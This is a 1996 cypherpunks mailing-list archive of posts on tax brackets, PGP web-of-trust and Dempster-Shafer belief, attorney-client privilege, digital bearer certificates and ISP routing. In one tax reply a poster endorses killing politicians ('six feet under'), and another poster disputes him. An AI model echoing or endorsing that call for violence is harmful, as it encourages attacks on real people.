>Incidentally, their pressure (especially the legal variety - acting as
>informants) could also include against an ISP that doesn't do the second for
>material the CyberAngels don't like.

>I do hope the CyberAngels seize on the other aspects of PICS that would
>effectively let them put CyberAngel stickers on every single page in
>cyberspace, if they have the attention span to actually pull this off.

	Quite. Anything that both the CyberAngels and, say, the Christian
Coalition rate as unsuitable for minors is likely to be interesting.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 13:43:40 +0800
To: tcmay@got.net
Subject: Re: Why I Pay Too Much in Taxes
Message-ID: <01I4FOV28VPS8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net"  7-MAY-1996 00:45:56.61

>By the way, as long as I've added another comment to this not-very-relevant
>thread (but one which has generated a lot of comments, so it's hard to hard
>folks aren't interested), I should mention that I left out the effects of
>INFLATION in my "60%" figure.

	Actually, inflation is relevant in a different way. In a system under
which a democratic (or otherwise popularly-influenced) government has some
control over the money supply, some inflation can be used as an invisible tax
going from those who save (primarily those of the middle class and above) to
those whose jobs are affected first by economic downturns (primarily those of
the middle class and below). This has relevance, in regards to privately
produced currencies and digital cash.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 13:53:19 +0800
To: stewarts@ix.netcom.com
Subject: Re: alias servers  (al la alias.c2.org)
Message-ID: <01I4FOXQ4H1Y8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart"  7-MAY-1996 01:18:29.63

>The big negative about using them as alias servers is that you have
>to use _their_ software and dial up to them; you can't get your mail
>by POP (though you can argue that it's harder to trace that way),
>and you have to use their silly advertisement-displaying user interface
>(shades of Prodigy!).  I assume that behind their silly interface
>is a standard network protocol, which somebody can decipher and
>figure out how to use SLIP or PPP or X.3/X.28/X.29 or whatever instead.

	Quite. There was a proposal a bit ago for someone to figure out how
the user interface worked and to put together a batch-filing remailer to use
their system. I haven't heard anything further on this.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Wed, 8 May 1996 13:07:33 +0800
To: cypherpunks@toad.com
Subject: Security Scruffies vs Neats, revisited
Message-ID: <v01540b02adb5a95e54e1@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


This is an attempt to restart the discussion in a slightly different direction.

I've been giving the topic some thought since Tim's truncated essay
appeared. But when I re-read it just now, I realized that I read in my own
interpretation of "scruffy" and "neat" to this.

IMHO, the critical property of AI scruffies is that they believe in the
value of some notion of emergent behavior -- if you build it right, it'll
surprise you and do something clever and unexpected to fulfill its
objectives. The "neats" have to know exactly why the behavior emerged, but
the scruffy methodology almost never allows such a detailed analysis to
succeed.

Intuitively, I tend to think of scruffies as trying to build biological
processes or concepts into computers. The goal seeking built into IP
packets, for instance. The Internet is an impossible artifact, if you view
distributed computing with '70s blinders. Nobody would want to cede control
so much to largely autonomous routers. Once you drop an IP packet into the
"system" it generally gets to its destination or dies of old age trying.

When I try to apply this style of thinking to security, I find myself going
towards layered defenses. These goal seeking, semi biological processes are
somewhat failure prone, so you probably need a set of them to make things
"safe." Falling back to biology, we see "security" in the various defensive
mechanisms developed in plants and animals.

But now things start to break down. "Security" these days means more than
defense -- it means access control. "Let me in" as well as "Keep them out."
How do you "tune" or "train" a semi-biological mechanism to exert such fine
control? It's not clear to me that you can. When I read Kevin Kelley's book
"Out Of Control" I kept wondering who wanted to live with his semi-biological
toasters and heating plants, tolerating burned toast and frozen bathrooms
until the devices finally "learned" how to behave. (but I shouldn't get
started on that book -- I once wrote 20 pages of notes about how bogus I
thought it was).

In other words, the problem may be with the concept of security itself.
Defense seems to be a biological concept, but security is not. It's too
artificial, involving the reflection of some abstract and arbitrary human
intent. Constructing a subsumption device to collect pop cans is one thing,
but building one to construct a cuckoo clock (or play doorman) is something
else.

Rick.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 14:09:10 +0800
To: JMKELSEY@delphi.com
Subject: Re: Escrowing signing vs. encryption keys
Message-ID: <01I4FP585MH88Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"JMKELSEY@delphi.com"  7-MAY-1996 01:22:19.14

>this is seen by the Feds to balance out the downside that, if I have
>the ability to do secure signatures with certificates, I can always
>use Diffie-Hellman to establish a secure session with someone else.

	This apparant opinion on their part is made more understandable with
the headaches involved in using Diffie-Hellman, as I understand it (multiple
back-and-forth transfers, et al).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 15:16:28 +0800
To: fair@clock.org
Subject: Re: Is the network layer geodesic?
Message-ID: <01I4FP905KBM8Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"fair@clock.org"  "Erik E. Fair"  7-MAY-1996 02:06:23.16

>The Internet is amorphous. It ain't a star, exactly, but it still not too
>far from that. However, to get away from this situation into the rich and
>more fully amorphous connectivity we used to take for granted in the UUCP
>network, we're going to have to see a lot more cooperation on the part of
>the small ISPs in agreeing to talk *directly* to each other to exchange
>traffic, and more small exchange points, instead of the small number of
>large ones.

	One thing that may make a difference in this is that the major
providers are getting overloaded. We're currently having problems here (in
terms of slowdowns, failures to connect, et al) because MCI's trunk lines
are majorly overloaded, and that's who _all_ the local ISPs go through. I am
currently attempting to persuade them to at least get contacts with another
ISP (and to serve as a router) in order to speed up local stuff.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 8 May 1996 13:17:50 +0800
To: cypherpunks@toad.com
Subject: Re: ecash payee anonymity, cpunk archives
In-Reply-To: <199605072236.RAA02543@proust.suba.com>
Message-ID: <v03006609adb58ff56f12@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:36 PM  -0400 5/7/96, Alex Strasheim wrote:
> Also, I missed whatever discussion there was about why the archives got
> shut down.  Was it a copyright thing?  A lack of resources?  No one to
> volunteer?

Which reminds me...

Anybody know offhand which countries *aren't* signatories to the (Berne?)
copyright conventions?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 8 May 1996 12:59:17 +0800
To: hfinney@shell.portal.com
Subject: Re: Transitive trust and MLM
Message-ID: <01I4FPJAW6Q08Y59D8@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal"  7-MAY-1996 18:58:41.28

>Unfortunately we are left with a choice between three not very good
>possibilities: accept transitive trust and hierarchical key CA
>structures; use very flat hierarchies where one signer validates huge
>numbers of keys; or accept that only a small number of keys can be
>validated by key signatures.  I think all these are troublesome and in
>fact it makes me question the whole notion of key signatures.

	I think the web-of-trust without transitivity of _some_ trust is too
limited. If a lot of completely-trusted key signators have signed a key, and
that person's key is self-signed and has signed the keys of those key
then keys signed with that person's key are significantly more likely to be
good than those without this signature. I wouldn't count the person as a
completely-trusted signator, but I wouldn't count them at 0 either.
	However, the above is just my opinion. Have any studies been done of
the likelihood of a key to be later discovered to not match up to the claimed
nym? I suspect there isn't adequate data as yet, but it could still be a good
thing to check.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "R.D. Contarino" <dik@vol.it>
Date: Wed, 8 May 1996 09:28:33 +0800
To: 103007.3426@compuserve.com
Subject: Re: (fwd) E-Commerce Info. Needed
In-Reply-To: <960503034747_103007.3426_GHU46-1@CompuServe.COM>
Message-ID: <199605071856.LAA28110@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I am writing a paper on electronic commerce, and I wonder if anyone happens to
> know of interesting URLs addressing the subject, including security issues?
> If you know of a good location for electronic commerce/security information,
> please email me directly
> at the following address:
> 103007.3426@compuserve.com
> THANKS A LOT!! Sally
> 

try www.verifone.com ...

as "Business Wire" reported yesterday, << HP and Verifone Form alliance
to market omnihost/hp9000 Payment processing solutions; targetting
financial-services institutions >>

Bye

Dario

--
R. D. Contarino
Video On Line
Sys. Adm. Dep.
e-mail: dik@vol.it




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Moltar Ramone <jlasser@rwd.goucher.edu>
Date: Wed, 8 May 1996 13:51:49 +0800
To: cypherpunks@toad.com
Subject: "bearer" certificates
In-Reply-To: <199605071754.KAA04543@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.960507210434.3059C-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 May 1996 anonymous-remailer@shell.portal.com wrote:

> Why not digitial "bearer" instruments be non-negotiable without
> a given signature?
> 
> I suppose these wouldn't be "bearer" but whatever we call them,
> doesn't this solve the double spending problem somewhat?
[ ... ]
> The instrument can be converted to a bearer instrument by the holder
> at any time by signing it over to noone as opposed to signing it over
> to a named party or key.  (Much like making a check payable to "cash")

Not with a MITM. Mallet just signs the certificate first and turns it in, 
before the other entity even receives it. The bank has no way to tell 
which of those two certificates would be invalid... and the anonymous 
entity gets screwed. Signed bearer certificates are great for 
non-anonymous communication...


----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 8 May 1996 16:09:37 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Transitive trust and MLM
Message-ID: <199605080409.VAA06882@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:13 PM 5/7/96 -0400, E. ALLEN SMITH wrote:
>From:   IN%"frantz@netcom.com"  7-MAY-1996 23:02:33.09
>
>>Some of the solution to this problem may come from the answer to the
>>question, "What am I trusting the receiver with?"  I can see a number of
>>possibilities:
>
>        I think you've forgotten to allow for the signature use. I may want to
>know if someone who's posting is indeed the usual/proper person posting from
>that address, and in most situations without transitivity I won't be able to
>tell.

Indeed, signing is something I shouldn't forget (having harassed Senator
Leahy on the same subject).  I will offer two observations on the subject:
(1) Many posts signed by the same key define a personality.  The key is
"key", not the email address, but they become associated. (2) When in
doubt, ask the poster via private email.  This method reduces to the levels
of trust I described in, "What am I trusting the receiver with?"

N.B. I don't sign my posts because I want "implausible deniability".

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 8 May 1996 16:01:12 +0800
To: Alex Strasheim <cypherpunks@toad.com
Subject: Re: ecash payee anonymity, cpunk archives
Message-ID: <199605080413.VAA03119@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:36 PM 5/7/96 -0500, Alex Strasheim wrote:
>A while back someone posted a note saying that an ecash protocol
>garaunteeing payee as well as payer anonymity had been devised.

I think that was about a week before Colby disappear, wasn't it?  B^)


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 13:54:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <adb505a504021004f699@[205.199.118.202]>
Message-ID: <Pine.SUN.3.93.960507205935.339E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 May 1996, Timothy C. May wrote:

> At 8:46 PM 5/7/96, Black Unicorn wrote:
> 
> >I'm not sure I understand what you mean.  I sent the text of the law to
> >the list.  The position that you take (that increse in inflation can send
> >you into the next tax bracket) is incorrect.
> 
> I wrote my comment before I saw your message. Does this make it clearer?

It does.  My apologies.

> I agree that the fewer brackets have lessened the problem in the last
> couple of years, but, then, inflation has not been an issue in the last
> couple of years. (I seem to recall an explicit statement that the brackets
> would not be adjusted upward, as the bill called for, because the inflation
> rate had been below the threshold....).

Any increse less than $50 in the bracket rates is rounded down to the next
multiple of $50 under Section 1(f)(6)(A).

I do also recall a threshold statement of some sort, but I always thought
it refered to the $50 rounding exception.

> In any case, my larger point has been about the effect over the last decade
> or so, where significant numbers of people are now up at the 40-45%
> marginal tax rate (Federal plus state, in many states).

Agreed.  And many states do not adjust taxation brackets for inflation.

> ...
> >Rates will not change with respect to inflation (to the extent that
> >inflation is accurately measured by the CPI).
> >
> >I believe an exception was made for the top bracket in 1994, but I don't
> >recall how it was implemented.
> 
> The top marginal rate was increased. As I recall, from around 38% to
> around 42%.

My 1994-1995 code indicates 39.6% for single heads of households with
incomes over $250,000.  (Pay $77,299, plus 39.6% of the excess over
$250,000).  That was for the 1994 tax year.

If there was an explicit raise, I haven't heard (though this isn't too
surprising, I haven't paid much attention to domestic U.S. tax rates
lately).

There is a phaseout of personal exemptions and deductions for the highest
bracket which can effectively bring the tax rate above 40%.  Is this what
you mean?  (Or have I been sleeping through the tax legislation process?)

> (As the money runs out, as the so-called trust funds turn out to be empty,
> as "entitlements" expand, and as more and more people are too
> poorly-educated and -motivated to succeed in high-paying jobs, I expect the
> top marginal rate to continue to be ratcheted upward. Until other forces
> come into play, of course.)

Agreed.  As per other forces, I can't see any given the Forbes fall and
the lack of interest in a flat reform measure.

I do, however, predict that compliance will begin to fall much more
dramatically following any explicit raise above 40%.
 
> 
> --Tim May
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 8 May 1996 13:16:35 +0800
To: cypherpunks@toad.com
Subject: INF_rno
Message-ID: <199605072123.VAA05561@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   5-7-96. NYT and WSJ report on Inferno, Lucent's (Bell Labs)
   new all-platform network OS, and its Limbo programming
   language.

   Dennis Richie says, "Inferno is a unique network operating
   system that adapts to whatever you plug into it -- from a
   high-end work station to an inexpensive hand-held device.
   Imagine the ease and flexibility of a world in which you
   can get your E-mail virtually anywhere, from any machine --
   on your PC at the office, from a screen phone in an
   airport, on your TV at home, or on a hotel-room TV."

   Dan Stanzione adds, "With Inferno, any device can
   communicate and share information with any device over any
   network."

   It is designed to coexist with Java and DOS.

   INF_rno











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 16:01:19 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Why I Pay Too Much in Taxes
In-Reply-To: <199605080005.RAA09126@pacifier.com>
Message-ID: <Pine.SUN.3.93.960507212053.339I-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 May 1996, jim bell wrote:

> At 04:46 PM 5/7/96 -0400, Black Unicorn wrote:

> >I'm not sure I understand what you mean.  I sent the text of the law to
> >the list.  The position that you take (that increse in inflation can send
> >you into the next tax bracket) is incorrect.
> 
> You seem to be forgetting that one of the provisions of (I believe) the 1986 
> tax act was that capital gains would be indexed  for inflation.  However, 
> the sleazy politicians only scheduled it (the indexing process) for about 
> 1990 or so, and by 1990 they managed to get that idiot Bush to agree to drop 
> it.

Considering that there is one bracket for capital gains income (namely
28%) what does this have to do with bouncing you into the next income tax
bracket?

> I don't know the details, but this is yet another of the reasons I have 
> no qualms about advocating a system for solving the "politician problem" by 
> putting them 6 feet under.

And yet another reason you cite which is based on incorrect facts.

> 
> Lawyers who profit from an abusive system may disagree, of course.
> 

So may all individuals who have a clue.

> Jim Bell
> jimbell@pacifier.com

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 8 May 1996 17:50:57 +0800
To: cypherpunks@toad.com
Subject: Dempster-Shafer Theory and Belief Networks (Re: Transitive trust)
Message-ID: <adb56863060210042993@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:50 PM 5/7/96, Hal wrote:
....
>It is important to eliminate a common misconception about the web of
>trust.  Suppose Alice signs Bob's key, and Bob signs Clara's, and
>Clara signs Don's key.  Suppose further that Alice trusts Bob and Bob
>trusts Clara as key signers, but that Alice doesn't know Clara.  In
>terms of PGP's web of trust, this does not give a chain from Alice to
>Don which lets her trust his key.  Alice has to have a signature on
>Don's key by someone she trusts.  In this case, since she doesn't know
>Clara she presumably can't trust her, and hence Clara's signature on
>Don's key is worthless to Alice.
...
>Unfortunately we are left with a choice between three not very good
>possibilities: accept transitive trust and hierarchical key CA
>structures; use very flat hierarchies where one signer validates huge
>numbers of keys; or accept that only a small number of keys can be
>validated by key signatures.  I think all these are troublesome and in
>fact it makes me question the whole notion of key signatures.


An interesting and thought-provoking essay.

I've never been comfortable with the term "trust," and tend to think in
terms of  a related but subtly different term, "belief."

"Do I _believe_ this person is who he says he is?"

"Do I _believe_ this applet I am downloading will not erase my hard disk?"

"Do I _believe_ MacWarehouse will ship the product I ordered last week?"

"Do I _believe_ the Russians when they say they are destroying warheads?"
(and recall Reagan's very accurate "Trust, but verify).

(and so on, for many examples where "believe" means something more than "trust")

Obviously, in many cases belief and trust are closely related, and saying I
believe Eric Hughes is the same as saying I trust Eric Hughes, at least in
some context. But belief also invokes other mechanisms, including
independent verification (as with multiply connected graphs), "commonsense
and sanity" tests, etc.

And beliefs are in some sense what we are really talking about. There is no
simple scalar quantity called "trust" (at least not one I can imagine), but
different agents will have different beliefs about different things. One
set of beliefs about signatures on keys has a lot of similarities to the
"web of trust." In fact, imagine this "diminishing wavefront of belief"
example:

"I believe that Eric Hughes is who he says he is, and that the key he
signed for me represents his signature. Further, he told me he believes
Peter Wayner to be who he says he is [many philosophical issues of identity
elided here], and that he believes because of several cross-checks he has
made that Peter's signature as stored at the MIT site is in fact that of
the journalist Peter Wayner. Because Eric believes Peter, and I believe
Eric, I tend to believe Peter's signature. Peter says he believes Joe Blow,
but neither Eric nor I have checked this, nor have we talked to Peter about
how confidant he is, or why he believes this, so I have to say I'm not
ready to say I believe in Joe Blow's signature."

Can this be more mechanized? Can numbers be attached, and perhaps
propagated? (I mentioned "diminishing wavefront of belief," because
implicit in this viewpoint, inevitably (and rightly, I think), is the
notion that "distant relations" have low probabilities of belief, all other
things being equal. (All other things are not equal, in many cases, and
there may be multiple paths to a person. As supporting evidence mounts, so
does the confidence level, or belief.

I believe [no pun intended] that some of the work in classical AI on belief
networks, aka Bayesian networks, is relevant. Reasoning in such networks,
where different beliefs are held about events, causes of events, reasons
for things happening, etc., seems quite similar to what we have in webs of
trust.

In particular, one form of belief representation seems especially relevant:
Dempster-Shafer theory.

A nice summary is contained in a wonderful book, "Artificial Intelligence:
A Modern Approach," Stuart Russell and Peter Norvig, 1995. On p. 462 they
write:

"The Dempster-Shafer theory is designed to deal with the distinction
between _uncertainty_ and _ignorance_. Rather than computing the
probability of a proposition, it computes the probability that the evidence
supports the proposition. This measure of belief is call a _belief
function_, written Bel(X).

"We return to coin flipping for an example of belief functions. Suppose a
shady character comes up to you and offers to bet you $10 that his coin
will come up on heads on the next flip. Given that the coin may or may not
be fair, what belief should you ascribe to the event of it coming up heads?
Dempster-Shafer theory says that because you have no evidence either way,
you have to say that the Bel(Heads) = 0, and also that the Bel(Not-Heads) =
0. This makes Dempster-Shafer reasoning systems skeptical in a way that has
some intuitive appeal. Now suppose you have an expert at your disposal who
testifies with 90% certainty that the coin is fair (i.e., he is 90% sure
that P(Heads) = 0.5). Then Dempster-Shafer theory gives Bel(Heads) = 0.9 x
0.5 = 0.45 and likewise Bel(Not-Heads) = 0.45. There is still a 0.1 "gap"
that is not accounted for by the evidence. "Dempster's rule" (Dempster,
1968) shows how to combine evidence to give new values for Bel, and
Shafer's work extends this into a complete computational model."

See why it looks promising? If it isn't clear, imagine the above example
rewritten slightly:

"We return to key signing for an example of belief functions. Suppose a
shady character comes up to you and claims that he has a list of signatures
he believes in. Given that you may or may not believe him, what belief
should you ascribe to the validity of his list? Dempster-Shafer theory says
that because you have no evidence either way, you have to say that the
Bel(List) = 0, and also that the Bel(Not-List) = 0. This makes
Dempster-Shafer reasoning systems skeptical in a way that has some
intuitive appeal. Now suppose you have an expert at your disposal who
testifies with 90% certainty that the shady stranger is to be believed
("trusted"). Then Dempster-Shafer theory gives Bel(List) = 0.9 x 1.0 = 0.9
and likewise Bel(Not-List) = 0.10. "Dempster's rule" (Dempster, 1968) shows
how to combine evidence to give new values for Bel, and Shafer's work
extends this into a complete computational model."

By converting the problem of "trust" to one of "belief," and accepting that
there may be "gaps," Dempster-Shafer theory has been useful in many
situations for analyzing changes of belief...seems to be similar to what we
face in the "web of trust."

(I believe the results will be similar to Phil's heuristic that "trust is
not transitive" and my point about a "diminishing wavefront of belief."

One way this may be mechanized is to ask people who sign keys to make an
estimate of their "belief" in each key, so that we might get something
like:

Bel-sub-May(Hughes) = 0.98
Bel-sub-May(Finney) = 0.96
Bel-sub-May(Wayner) = 0.70
....
Bel-sub-May(tallpaul) = 0.05
...
and so on, where "Bel-sub-May" means the belief I (May) have in some
signature being properly done...FOR WHATEVER REASONS I MAY HAVE!

Likewise, Hal Finney may have pretty good confidence that I am a careful
checker of such things, so maybe he ascribes Bel-sub-Finney(May) to be
0.80.

(The careful reader will have noticed that I switch between talking about
belief in signatures and belief in methodology. It may be possible to
handle these differently, but I think in a real sense they are best handled
as the same thing. Thus, I am saying to Hal, "I place these amounts of
trust (belief, really) in these signatures," and Hal says to me, "Well,
based on past experience, I tend to believe you, at least with 80%
confidence, so I'll take your estimates and pass them on, normalized by my
belief factor." Not perfect, but then how can it ever be, due to the
semantics of probabalistic belief.)

Hierarchical systems are not necessarily any better, in that a hierarchical
system may just be Bill Gates saying:

Bel-sub-any_employee(Gates) = 1.0

(Thus, every employee is told to believe any statement by Bill Gates,
including passing on belief in the statements of his designated key
authorities!)

By the way, the work on back propagation in belief networks looks to be
very promising vis-a-vis the "reputations" we so often talk about. In the
example above, where "suppose you have an expert at your disposal who
testifies with 90% certainty that the coin is fair," imagine the results of
many coin tosses. If the coin tosses turn out to be 900 heads and 100
tails, then one might expect the "belief" in the "expert" will decline
rapidly. Like a bad consultant, or bad advice.

Dempster-Shafer theorists have done a lot of work on how to actually
compute using these belief probabilities, how to propagate beliefs, and
what the limits are.

Seems pretty applicable to studying webs of trust (which are actually
"belief networks").

Thanks, Hal, for stimulating this discussion.


--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 8 May 1996 15:21:47 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.93.960507215740.339K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


On Tue, 7 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 29-APR-1996 02:21:48.23
> 
> >On Sun, 28 Apr 1996, E. ALLEN SMITH wrote:
> 
> >> 	Given discussions as to attorneys holding passphrases, et al, perhaps
> >> a tutorial from the lawyers on the list (yourself and others, since
> >> disagreements among J.D.'s have been known to happen) on what attorney-client
> >> confidentiality does cover?
> 
> >Proposed FRE 503 probably has the best codification of the prevailing
> >common law on the subject.  I reproduce it in part below.  Typos are mine.
> 
> 	Thank you.

Sure.

> >The identity of the client and the existance of the attorney client
> >relationship are not confidential.  There are some exceptions.
> 
> 	What are the exceptions?


When a client wishes to make anonymous restitution.  Baird v. Koerner, 279
F.2d 623 (9th Cir. 1960) (Wherein attorney was retained to organize
anonymous payment of delinquent taxes and IRS demmanded identification of
clients by attorney).

The so called "missing link" exception, where where disclosure of the
identity of client, in conjunction with already available information,
would have the effective result of disclosing a privileged communication
or violating the privilege against self incrimination.  In re Grand Jury
Proceedings, 517 F.2d 666 (5th Cir. 1975); C.f., U.S. v Pape, 144 F.2d 778
(2nd Cir. 1944) (Holding that client's identity was not so protected,
but which may or may not still be good law); See Generally, Cleary et al,
McCormick on Evidence (3rd edition 1984).

> >Stolen property may be held by an attorney for a reasonable time for
> >inspection purposes, but must be returned to the rightful owner or the
> >attorney will be a receiver of stolen goods and participating in an
> >ongoing crime.  Privilege will thus not apply.  In re Ryder, 263 F.Supp.
> >360 (E.D.Va 1967).  (Some courts will permit the attorney to refuse to
> >disclose the source from which he obtained the property, however).
> >Consider this in the context of trade secrets.
> 
> 	A good point... although if it hasn't been proven whether something is
> stolen (e.g., an encrypted piece of data sent to the attorney), I would hope
> that privilege would still obtain. Of course, there would be the question
> (also important for First Amendment issues) of whether information that the
> recipient can't understand is communication.

Generally speaking, if the attorney believes or should reasonably know
that the item was stolen, privilege will not apply.

> >All states have laws against destroying or concealing evidence.  The
> >attorney who advises his client to destroy evidence is a co-consiprator.
> >Privilege does not apply.  Clark v. State, 261 S.W.2d 339 (Crim. App Tex.
> >1953).  (Interesting to wonder if advising a client to encrypt evidence is
> >'concealing' it).
> 
> 	A good question. Of course, again there's the point of what if the
> attorney has investigated the matter and decided that no crime is being
> committed, but that the material should be destroyed because it could be
> embarrasing, lead to other problems (e.g., civil lawsuits), etcetera. If a
> court later decides that the attorney was wrong, would privilege still obtain,
> and would the attorney be a co-conspirator? I would hope the answers would be
> yes and no.

First question, I can think of few attornies who would actually advise a
client to destroy something that might even one day possibly be evidence.
Well, let me rephrase that.  I can think of few attornies who would
actually advise a client to destroy something that might even one day
possibly be evidence if they thought they might be caught.

Second question, If the court thinks it was a crime and evidence was
destroyed it doesn't much matter what the attorney thought at the time.
I'll have to check, but this is probably a "reasonably forseeable"
question.

On Confidentiality:

See Generally, Fred Zacharias, Rethinking Confidentiality, 74 Iowa L. Rev.
351 (1989); Fred Zacharias, Rethinking Confidentiality II, 75 Iowa L. Rev.
601 (1990); Geoffrey Hazard, A Historical Perspective on the Attorney
Client Privilege, 66 Calif. L. Rev. 1061 (1978); Developments in the Law:
Privileged Communications, 98 Harv. L. Rev. 1450 (1985).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMY//fmqgui0rHO4JAQGDXQQAvSuhnF5SAHTfGd/EhDH2DMNKd8IquqED
FGvD0QrEU+3jzNlNKouqnG0SSsP6ILDpUnwDr6ZvGSrc147Kvf37fP6EIMeqGG6A
7wFfrDrr7Lo/96VXnY6Sd9mI5evxDoUDPr6PS+1rbW2le5s8q0mI6C+cFXM5TDEo
jY4mQqePufc=
=syxB
-----END PGP SIGNATURE-----

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Wed, 8 May 1996 19:05:21 +0800
To: cypherpunks@toad.com
Subject: Chat with WhoWhere.com
Message-ID: <Pine.GUL.3.93.960507214739.14261B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So we did lunch. They even paid. I had a turkey club sandwich and a
strawberry/banana smoothie.

At this time, I cannot discuss (publicly) much of what was said, but I can
say that some progress was made.

* There is not currently a "deny" list. I.e., if you ask WhoWhere to
  delete your name, address, and phone number, they will usually do it
  within 48 hours, but it is entirely possible that an automated process
  will reenter your address the next day. They agree that this is
  something that should be fixed.

* They do indeed run an undocumented web spider to search for email
  addresses. Soon, they will register it on the WebCrawler page and follow
